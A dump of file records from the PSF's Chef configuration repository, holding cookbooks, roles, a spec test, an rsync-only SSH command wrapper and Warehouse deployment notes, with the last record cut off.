"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2524,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 99,
"path": "/cookbooks/user/test/attributes/default_spec.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "require 'minitest/autorun'\nrequire 'chef/node'\nrequire 'chef/platform'\n\ndescribe 'User::Attributes::Default' do\n let(:attr_ns) { 'user' }\n\n before do\n @node = Chef::Node.new\n @node.consume_external_attrs(ohai_data, {})\n @node.from_file(File.join(File.dirname(__FILE__), %w{.. .. attributes default.rb}))\n end\n\n let(:ohai_data) do\n { :platform => \"default_os\", :platform_version => '1.23' }\n end\n\n %w{debian ubuntu redhat centos amazon scientific fedora freebsd suse}.each do |platform|\n describe \"for #{platform} platform\" do\n let(:ohai_data) do\n { :platform => platform, :platform_version => '666' }\n end\n\n it \"sets default home root\" do\n @node[attr_ns]['home_root'].must_equal \"/home\"\n end\n\n it \"sets default shell\" do\n @node[attr_ns]['default_shell'].must_equal \"/bin/bash\"\n end\n end\n end\n\n %w{openbsd}.each do |platform|\n describe \"for #{platform} platform\" do\n let(:ohai_data) do\n { :platform => platform, :platform_version => '666' }\n end\n\n it \"sets default home root\" do\n @node[attr_ns]['home_root'].must_equal \"/home\"\n end\n\n it \"sets default shell\" do\n @node[attr_ns]['default_shell'].must_equal \"/bin/ksh\"\n end\n end\n end\n\n %w{mac_os_x mac_os_x_server}.each do |platform|\n describe \"for #{platform} platform\" do\n let(:ohai_data) do\n { :platform => platform, :platform_version => '666' }\n end\n\n it \"sets default home root\" do\n @node[attr_ns]['home_root'].must_equal \"/Users\"\n end\n\n it \"sets default shell\" do\n @node[attr_ns]['default_shell'].must_equal \"/bin/bash\"\n end\n end\n end\n\n %w{bogus_os}.each do |platform|\n describe \"for #{platform} platform\" do\n let(:ohai_data) do\n { :platform => platform, :platform_version => '666' }\n end\n\n it \"sets default home root\" do\n @node[attr_ns]['home_root'].must_equal \"/home\"\n end\n\n it \"sets a nil default shell\" do\n @node[attr_ns]['default_shell'].must_be_nil\n end\n end\n end\n\n describe \"for all platforms\" do\n it \"sets default manage home\" do\n @node[attr_ns]['manage_home'].must_equal \"true\"\n end\n\n it \"sets default create user group\" do\n @node[attr_ns]['create_user_group'].must_equal \"true\"\n end\n\n it \"sets default ssh keygen\" do\n @node[attr_ns]['ssh_keygen'].must_equal \"true\"\n end\n\n it \"sets default data bag\" do\n @node[attr_ns]['data_bag'].must_equal \"users\"\n end\n end\nend\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 20,
"blob_id": "916f0c76bdffa7023840553cadd065c457d2a741",
"content_id": "1e5d41ac9f35a27db8e3373e8e630fa2b2562f67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 3,
"path": "/cookbooks/rsnapshot/providers/script.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n # This space left intentionally blank\nend\n"
},
{
"alpha_fraction": 0.6847015023231506,
"alphanum_fraction": 0.6958954930305481,
"avg_line_length": 32.5,
"blob_id": "801554e217ca66804599016eb7d68b93c3af54cd",
"content_id": "5442690c8a8f83f03a04b51daa1e2c809eb484d4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 536,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 16,
"path": "/cookbooks/user/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "maintainer \"Fletcher Nichol\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"A convenient Chef LWRP to manage user accounts and SSH keys (this is not the opscode users cookbook)\"\nlong_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))\nversion \"0.2.13\"\n\nsupports \"ubuntu\"\nsupports \"debian\"\nsupports \"mac_os_x\"\nsupports \"suse\"\n\nrecipe \"user\", \"This recipe is a no-op and does nothing.\"\nrecipe \"user::data_bag\", \"Processes a list of users with data drawn from a data bag.\"\n\ndepends \"sudo\"\n"
},
{
"alpha_fraction": 0.6895943284034729,
"alphanum_fraction": 0.6895943284034729,
"avg_line_length": 24.772727966308594,
"blob_id": "4a120fce2e4e8d07cbc591457aef5039ae3b8d56",
"content_id": "06f9cc866cf2a95d94e08a0a68ba26ff63b5da5e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1134,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 44,
"path": "/cookbooks/user/test/spec_helper.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "require 'chef/resource'\nrequire 'chef/resource'\n\nmodule ResourceMixins\n def load_resource(cookbook, lrwp)\n Chef::Resource.build_from_file(cookbook.to_s, File.expand_path(File.join(\n File.dirname(__FILE__), %w{.. resources}, \"#{lwrp.to_s}.rb\")), nil)\n end\n\n def unload_resource(cookbook, lwrp)\n Chef::Resource.send(:remove_const, lwrp_const(cookbook, lwrp))\n end\n\n def resource_klass(cookbook, lwrp)\n Chef::Resource.const_get(lwrp_const(cookbook, lrwp))\n end\n\n private\n\n def lwrp_const(cookbook, lwrp)\n :\"#{cookbook.to_s.capitalize}#{lwrp.to_s.capitalize}\"\n end\nend\n\nmodule ProviderMixins\n def load_provider(cookbook, lrwp)\n Chef::Provider.build_from_file(cookbook.to_s, File.expand_path(File.join(\n File.dirname(__FILE__), %w{.. resources}, \"#{lwrp.to_s}.rb\")), nil)\n end\n\n def unload_provider(cookbook, lwrp)\n Chef::Provider.send(:remove_const, lwrp_const(cookbook, lwrp))\n end\n\n def provider_klass(cookbook, lwrp)\n Chef::Provider.const_get(lwrp_const(cookbook, lrwp))\n end\n\n private\n\n def lwrp_const(cookbook, lwrp)\n :\"#{cookbook.to_s.capitalize}#{lwrp.to_s.capitalize}\"\n end\nend\n"
},
{
"alpha_fraction": 0.6841046214103699,
"alphanum_fraction": 0.6841046214103699,
"avg_line_length": 54.22222137451172,
"blob_id": "b9c56ec97ee7099182a0fd927f8336f8390f798b",
"content_id": "411aeef5e900e39d8514e24cb2c6927cc1d49197",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 9,
"path": "/cookbooks/psf-evote/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "node.default['psf-evote']['development'] = false\nnode.default['psf-evote']['dburi'] = 'sqlite://storage.sqlite'\nnode.default['psf-evote']['email_sender'] = '[email protected]'\nnode.default['psf-evote']['as_service'] = false\nnode.default['psf-evote']['debug_mode'] = false\nnode.default['psf-evote']['scheme'] = 'https'\nnode.default['psf-evote']['title'] = 'PSF E-Vote'\nnode.default['psf-evote']['subtitle'] = 'Online voting for the Python Software Foundation'\nnode.default['psf-evote']['author'] = '[email protected]'\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 44,
"blob_id": "3a78ce121fbf95f7910d9130e0652a86f8bd2278",
"content_id": "0e73a0efbf56139f6cad8330cc83cf70007f0837",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 3,
"path": "/cookbooks/haproxy/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default['haproxy']['user'] = 'haproxy'\ndefault['haproxy']['group'] = 'haproxy'\ndefault['haproxy']['config_directory'] = '/etc/haproxy'\n"
},
{
"alpha_fraction": 0.6895522475242615,
"alphanum_fraction": 0.6895522475242615,
"avg_line_length": 36.22222137451172,
"blob_id": "186b9d1fd5b3cd8d09c872a49a79dbef215bdc6e",
"content_id": "6e12f0200b961257c854479094d8c7ca42183199",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 335,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 9,
"path": "/cookbooks/psf-pypi/attributes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Logging Configuration\ndefault[\"pypi\"][\"cdn\"][\"logging\"][\"app_name\"] = \"pypicdn\"\ndefault[\"pypi\"][\"cdn\"][\"logging\"][\"process_script\"] = \"/data/pypi/tools/rsyslog-cdn.py\"\n\n# Warehouse Domain Setup\ndefault[\"warehouse\"][\"domains\"] = [\"pypi.python.org\"]\n\n# Warehouse Elasticsearch Setup\ndefault[\"warehouse\"][\"elasticsearch\"][\"hosts\"] = []\n"
},
{
"alpha_fraction": 0.6896551847457886,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 27.799999237060547,
"blob_id": "55423e5d7173aba639e5f06326919822073ae631",
"content_id": "326d7aface91daf729ef12a30037d19b35feac2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 5,
"path": "/cookbooks/haproxy/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "haproxy 'haproxy' do\n user node['haproxy']['user']\n group node['haproxy']['group']\n config_directory node['haproxy']['config_directory']\nend\n\n"
},
{
"alpha_fraction": 0.702479362487793,
"alphanum_fraction": 0.702479362487793,
"avg_line_length": 19.16666603088379,
"blob_id": "4464c6209ead8cbec8080f56bc0a20be53c191ed",
"content_id": "73c8aec3b95c89cca98747144b03839dd6d9f361",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 121,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 6,
"path": "/roles/psf-pycon-staging.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-pycon-staging\"\ndescription \"Staging for Pycon website\"\n# Owner: Diana Clark\nrun_list [\n \"recipe[psf-pycon::app]\"\n]\n"
},
{
"alpha_fraction": 0.5318471193313599,
"alphanum_fraction": 0.5509554147720337,
"avg_line_length": 27.545454025268555,
"blob_id": "96eca2176788582834df0a1fd8f3362798aa3bf8",
"content_id": "bba3093f9718526482c4335fe6d3c91374ca9b54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 11,
"path": "/cookbooks/psf-debbuild/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-debbuild\"\nmaintainer \"Donald Stufft\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Installs and configures builders\"\nversion \"0.0.19\"\n\ndepends \"reprepro\"\ndepends \"poise\"\ndepends \"jenkins\"\ndepends \"postgresql\"\n"
},
{
"alpha_fraction": 0.7292817831039429,
"alphanum_fraction": 0.7292817831039429,
"avg_line_length": 24.85714340209961,
"blob_id": "f6e2b3d3d18a9d81ce46dbaf813db514d0560d9a",
"content_id": "37d0ae9ab7fbfb523c81a8cae012697958b24f40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/roles/loadbalancer.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"loadbalancer\"\ndescription \"PSF load balancer\"\nrun_list [\n \"recipe[psf-loadbalancer::heartbeat]\",\n \"recipe[psf-loadbalancer::haproxy]\",\n \"recipe[psf-loadbalancer::stud]\",\n]\n"
},
{
"alpha_fraction": 0.6246851682662964,
"alphanum_fraction": 0.6397984623908997,
"avg_line_length": 22.352941513061523,
"blob_id": "731036670299106fdaa135a1c993c005dc948e1e",
"content_id": "2344e3150f784fcd66ca25ec01797aef43f3b1a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 17,
"path": "/cookbooks/rsnapshot/files/default/rsync.py",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport os\nimport re\nimport shlex\nimport sys\n\ncmd = os.environ.get('SSH_ORIGINAL_COMMAND')\nif not cmd:\n print 'No command given'\n sys.exit(1)\n\nif re.match(r'^rsync --server --sender -[a-zA-Z0-9.]+ --numeric-ids . [a-zA-Z0-9_/-]+$', cmd):\n cmd_args = shlex.split(cmd)\n os.execv('/usr/bin/rsync', cmd_args)\nelse:\n print 'Command %r unnacceptable'%cmd\n sys.exit(1)\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 19,
"blob_id": "04675de654a53495946b1d00c9a9f418655433e1",
"content_id": "307b2ea7ec3cf63e3f5a4e5702289aee1b8e3c87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 4,
"path": "/cookbooks/psf-misc/recipes/ack.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Because Gaynor bugged me about it\npackage 'ack-grep' do\n action :upgrade\nend\n"
},
{
"alpha_fraction": 0.6870229244232178,
"alphanum_fraction": 0.7022900581359863,
"avg_line_length": 27.071428298950195,
"blob_id": "1e286be3ab6cb08b303e0d7882c543b80cdcd789",
"content_id": "7bf0a21db8bf5d677ca456e0c6fffe7957cdd239",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 393,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 14,
"path": "/cookbooks/psf-pycon/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "maintainer \"Ernest W. Durbin III\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Configuration for us.pycon.org staging and production\"\nlong_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))\nversion \"0.0.44\"\n\ndepends \"sudo\"\ndepends \"application_python\"\ndepends \"application_nginx\"\ndepends \"nodejs\"\ndepends \"git\"\ndepends \"firewall\"\ndepends \"cron\"\n"
},
{
"alpha_fraction": 0.6832548975944519,
"alphanum_fraction": 0.7027572393417358,
"avg_line_length": 18.5657901763916,
"blob_id": "3c937ecd31122699778c4bc77497c19f7f724787",
"content_id": "54681a17da46a343e53f4c009139af39128e00a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 76,
"path": "/cookbooks/psf-debbuild/recipes/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Get our secrets\nsecrets = data_bag_item(\"secrets\", \"debbuild\")\n\n# Put our python-virtualenv package into reprepro\ncookbook_file \"python-virtualenv_1.10.1-1_all.deb\" do\n path \"/tmp/python-virtualenv_1.10.1-1_all.deb\"\n action :create_if_missing\nend\n\nreprepro_deb \"/tmp/python-virtualenv_1.10.1-1_all.deb\"\n\n# Put our dh-virtualenv package into reprepro\ncookbook_file \"dh-virtualenv_0.6_all.deb\" do\n path \"/tmp/dh-virtualenv_0.6_all.deb\"\n action :create_if_missing\nend\n\nreprepro_deb \"/tmp/dh-virtualenv_0.6_all.deb\"\n\n# Install Jenkins\njenkins node['jenkins']['server']['home']\njenkins_plugin \"git\"\njenkins_plugin \"debian-package-builder\"\njenkins_plugin \"ws-cleanup\"\njenkins_plugin \"postbuildscript\"\n\nsudo \"jenkins\" do\n user \"jenkins\"\n nopasswd true\nend\n\n# Install git\npackage \"git\"\n\n# Install equivs\npackage \"equivs\"\n\n# Install Twine\npython_pip \"twine\" do\n action :upgrade\nend\n\n# Install PyPI Credentials\nfile \"/#{node['jenkins']['server']['home']}/.pypirc\" do\n owner \"jenkins\"\n group \"jenkins\"\n mode \"0600\"\n\n backup false\n\n content <<-eos\n[distutils]\nindex-servers =\n pypi\n\n[pypi]\nrepository:https://pypi.python.org/pypi\nusername:#{secrets['pypi_username']}\npassword:#{secrets['pypi_password']}\neos\nend\n\ndirectory \"/#{node['jenkins']['server']['home']}/.ssh\" do\n owner \"jenkins\"\n group \"jenkins\"\nend\n\nfile \"/#{node['jenkins']['server']['home']}/.ssh/id_rsa\" do\n owner \"jenkins\"\n group \"jenkins\"\n mode \"0600\"\n\n backup false\n\n content secrets[\"ssh_key\"]\nend\n"
},
{
"alpha_fraction": 0.6415094137191772,
"alphanum_fraction": 0.698113203048706,
"avg_line_length": 12.25,
"blob_id": "6dea6ddc4b649e32d3cb497bafef41f28e581569",
"content_id": "db9cf9f29518bc682227ba131b92e0fef1983908",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 4,
"path": "/cookbooks/psf-postgresql/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name 'psf-postgresql'\nversion '0.0.2'\n\ndepends 'apt'\n"
},
{
"alpha_fraction": 0.651397168636322,
"alphanum_fraction": 0.6550618410110474,
"avg_line_length": 26.632911682128906,
"blob_id": "88f24922f0fb065cee9fe8fa13a65840d22791d2",
"content_id": "42af3221a7a096bd02486ade149d2c4a58d72f07",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 2183,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 79,
"path": "/cookbooks/user/recipes/data_bag.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "#\n# Cookbook Name:: user\n# Recipe:: data_bag\n#\n# Copyright 2011, Fletcher Nichol\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\ninclude_recipe 'sudo'\n\nbag = node['user']['data_bag']\nlockdown = node['user']['lockdown']\n\nadmin_group = []\n\nsearch(bag, \"*:*\") do |u|\n username = u['username'] || u['id']\n\n # Figure out if we should force-remove this user\n remove_user = u['roles'].is_a?(Array) && !u['roles'].any?{|role| node['roles'].include?(role)}\n\n # If :sudo is an array, check roles, otherwise if it is true just apply sudo globally\n if u['sudo'].is_a?(Array) && u['sudo'].any?{|role| node['roles'].include?(role)}\n admin_group << username\n elsif u['sudo'].is_a?(Hash) && u['sudo'].any?{|role, cmd| node['roles'].include?(role)}\n cmds = []\n u['sudo'].each_pair do |role, cmd|\n cmds << cmd if node['roles'].include?(role)\n end\n if !cmds.empty?\n sudo username do\n user username\n commands cmds\n nopasswd true\n end\n end\n elsif u['sudo'] == true\n admin_group << username\n elsif lockdown\n # When under lockdown mode, any user without sudo isn't allowed in at all\n remove_user = true\n end\n\n user_account username do\n %w{comment uid gid home shell password system_user manage_home create_group\n ssh_keys ssh_keygen}.each do |attr|\n send(attr, u[attr]) if u[attr]\n end\n\n # If you don't match the roles for this node, make sure you don't exist\n if remove_user\n action :remove\n else\n action u['action'].to_sym if u['action']\n end\n end\nend\n\ngroup \"admin\" do\n action [:create, :manage]\n members admin_group\nend\n\nsudo \"admin\" do\n group \"admin\"\n nopasswd true\n commands [\"ALL\"]\nend\n"
},
{
"alpha_fraction": 0.6544502377510071,
"alphanum_fraction": 0.6701570749282837,
"avg_line_length": 24.46666717529297,
"blob_id": "c6831a40cc46e3bc115eab60a7cc9a5cfe0f43ca",
"content_id": "0a91941b0798bc8a8dd1a149a571fa93ffb75f06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 15,
"path": "/cookbooks/pgbouncer/resources/user.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "attribute :name, :name_attribute => true\nattribute :password, :kind_of => [String, NilClass]\nattribute :hash, :equal_to => %{plain md5 crypt}, :default => 'md5'\n\ndef password_hash\n case self.hash\n when 'plain'\n self.password\n when 'md5'\n require 'digest/md5'\n 'md5' + Digest::MD5.hexdigest(self.password + self.name)\n when 'crypt'\n raise 'Not implemented'\n end\nend\n"
},
{
"alpha_fraction": 0.7536057829856873,
"alphanum_fraction": 0.7616186141967773,
"avg_line_length": 40.599998474121094,
"blob_id": "d43ee3a7316dc223451f148c05c412a630c22c56",
"content_id": "9e335a760f6808a1ae5cda013d09877570f999dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 2496,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 60,
"path": "/doc/services/warehouse.rst",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Warehouse\n=========\n\nWarehouse is deployed continuously. Every push to master triggers a new build\nwhich will get picked up the next time the deployment procedure is run on\nthe Warehouse servers. The process is:\n\n1. For every push to master, except those automatically generated by the\n release process, trigger a new test run which will ensure nothing has\n broken. If the test run completes successfully, then a new build job is\n triggered in Jenkins.\n2. Jenkins will generate and tag a new version for the next release of\n Warehouse, following a version scheme of ``YY.MM.NN``, where ``NN`` is an\n incrementing serial number.\n3. Jenkins will generate a new Python source distribution and Wheel of the\n latest release.\n4. Jenkins will generate a new Debian package of the latest version, bundling\n Warehouse and all of its dependencies into a single virtual environment\n which, when installed, will end up in ``/opt/warehouse``.\n5. If generating both the Python packages and the Debian package was successful\n then Jenkins will publish the Python packages to PyPI, the Debian packages\n to an internal apt repository, and push the tagged version to GitHub.\n6. Chef will periodically (every 30 minutes) check the internal apt repository\n for an updated package and will update to the latest version if needed.\n\n\nEnvironment / Dependencies\n--------------------------\n\n* PyPy\n* PostgreSQL 9.2+ (Hosted by OSUOL)\n* Elasticsearch\n\n\nConfiguration\n-------------\n\nWarehouse is configured using a YAML file which the cookbook will write to\n``/opt/warehouse/etc/config.yml``.\n\n\nDebian Packages and Virtual Environments\n----------------------------------------\n\nThe Warehouse deployment uses Debian packaging as a means of delivery to the\napplication servers. This allows us to easily generate a build artifact and\nthen deploy that built artifact to the application server.\n\nUsing a modified `dh-virtualenv`_ the build process for the Debian package\ncreates a new virtual environment, installs Warehouse and all of its\ndependencies into that virtual environment, and then packages the resulting\nenvironment into a single debian package.\n\nThis setup was chosen because it offers the best isolation from build time\nfailures. It also moves as much of the process into a one time build process\ninstead of needing to execute a pip install every 30 minutes to check for\nupdated requirements.\n\n\n.. _dh-virtualenv: http://labs.spotify.com/2013/10/10/packaging-in-your-packaging-dh-virtualenv/\n"
},
{
"alpha_fraction": 0.6506550312042236,
"alphanum_fraction": 0.6581409573554993,
"avg_line_length": 20.958904266357422,
"blob_id": "c763cce536a5f08344d143a765935b8a2b3afbd5",
"content_id": "c426e0b1c69cec0356feb11653918a613c40c6d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1603,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 73,
"path": "/cookbooks/pgbouncer/providers/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n group 'postgres' do\n system true\n end\n\n user 'pgbouncer' do\n comment 'PgBouncer service'\n gid 'postgres'\n system true\n shell '/bin/false'\n home '/var/lib/postgresql'\n end\n\n package 'pgbouncer' do\n action :upgrade\n end\n\n execute '/etc/init.d/pgbouncer stop' do\n user 'root'\n only_if { ::File.exists? '/etc/init.d/pgbouncer' }\n end\n\n file '/etc/default/pgbouncer' do\n action :delete\n end\n\n file '/etc/init.d/pgbouncer' do\n action :delete\n end\n\n template '/etc/init/pgbouncer.conf' do\n source 'upstart.conf.erb'\n owner 'root'\n group 'root'\n mode '644'\n variables :pgbouncer => new_resource\n notifies :restart, 'service[pgbouncer]'\n end\n\n service 'pgbouncer' do\n action :enable\n provider Chef::Provider::Service::Upstart\n supports :reload => true, :status => true\n end\n\n directory '/etc/pgbouncer' do\n owner 'root'\n group 'root'\n mode '755'\n end\n\n template '/etc/pgbouncer/pgbouncer.ini' do\n source 'pgbouncer.ini.erb'\n owner 'root'\n group 'postgres'\n mode '640'\n notifies :reload, 'service[pgbouncer]'\n variables :pgbouncer => new_resource, :databases => run_context.resource_collection.select {|res| res.is_a? Chef::Resource::PgbouncerDatabase}\n end\n\n template '/etc/pgbouncer/users' do\n source 'users.erb'\n owner 'root'\n group 'postgres'\n mode '640'\n notifies :reload, 'service[pgbouncer]'\n variables :users => run_context.resource_collection.select {|res| res.is_a? Chef::Resource::PgbouncerUser}\n end\n\n service 'pgbouncer' do\n action :start\n end\nend\n"
},
{
"alpha_fraction": 0.6861313581466675,
"alphanum_fraction": 0.6934306621551514,
"avg_line_length": 18.571428298950195,
"blob_id": "7bcc12378b41f85fe8e31585063d89e445b4e7f0",
"content_id": "7d1c98a718c08af32d65e53e08a08a4ad57e31b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 7,
"path": "/roles/evote.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"evote\"\ndescription \"EVote web2py application\"\n# Owner: David Mertz/Massimo\nrun_list [\n \"recipe[psf-evote]\",\n \"role[postfix-relay]\",\n]\n"
},
{
"alpha_fraction": 0.5559566617012024,
"alphanum_fraction": 0.570397138595581,
"avg_line_length": 22.08333396911621,
"blob_id": "52db395381712806fd409089d3f88dbb9d2dc82b",
"content_id": "0ff7cde08e3e798c00630fd3da2240395923972d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 12,
"path": "/.berkshelf-test-config.js",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "{\n \"chef\": {\n \"chef_server_url\": \"http://localhost:8889\",\n \"validation_client_name\": \"psf-validator\",\n \"validation_key_path\": \".chef/psf-validator.pem\",\n \"client_key\": \".chef/fake-client.pem\",\n \"node_name\": \"fake-node\"\n },\n \"ssl\": {\n \"verify\": false\n }\n}\n"
},
{
"alpha_fraction": 0.6901960968971252,
"alphanum_fraction": 0.7078431248664856,
"avg_line_length": 24.5,
"blob_id": "71ad1d4abb323ff2f6a1decdd86b1e8129e8fa28",
"content_id": "caf916e1ff5292debe4d4511d133fd35dc577326",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 510,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 20,
"path": "/cookbooks/psf-postgresql/recipes/92.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Via http://wiki.postgresql.org/wiki/Apt/FAQ#I_want_only_specific_packages_from_this_repository\n# Not actually working\n# cookbook_file '/etc/apt/preferences.d/pgdg.pref' do\n# owner 'root'\n# group 'root'\n# mode '644'\n# source 'pgdg.pref'\n# end\n\napt_repository 'pgdg' do\n uri 'http://apt.postgresql.org/pub/repos/apt/'\n arch 'amd64'\n distribution 'precise-pgdg'\n components ['main']\n key 'http://apt.postgresql.org/pub/repos/apt/ACCC4CF8.asc'\nend\n\npackage 'postgresql-9.2' do\n action :upgrade\nend\n"
},
{
"alpha_fraction": 0.6536796689033508,
"alphanum_fraction": 0.7056276798248291,
"avg_line_length": 37.5,
"blob_id": "0d12b4bf8d399e6d6771026bd101b1e1039ab3fc",
"content_id": "2e6300ef4cb830cb41a4ca9b47bbd697ff097114",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 12,
"path": "/cookbooks/psf-pycon/recipes/local_db.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Setup postgres locally for testing\ndb = data_bag_item(\"secrets\", \"postgres\")[\"pycon2014\"]\n\npostgresql_database_user db['user'] do\n connection host: \"127.0.0.1\", port: 5432, username: 'postgres', password: node['postgresql']['password']['postgres']\n password db['password']\nend\n\npostgresql_database db['database'] do\n connection host: \"127.0.0.1\", port: 5432, username: 'postgres', password: node['postgresql']['password']['postgres']\n owner db['user']\nend\n"
},
{
"alpha_fraction": 0.6480144262313843,
"alphanum_fraction": 0.7346570491790771,
"avg_line_length": 60.55555725097656,
"blob_id": "eb37d1a945283214d6c41b6d57a27997c385f8f8",
"content_id": "2535946710bdd308d1043cabd1088d0281e24743",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 9,
"path": "/cookbooks/haproxy/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
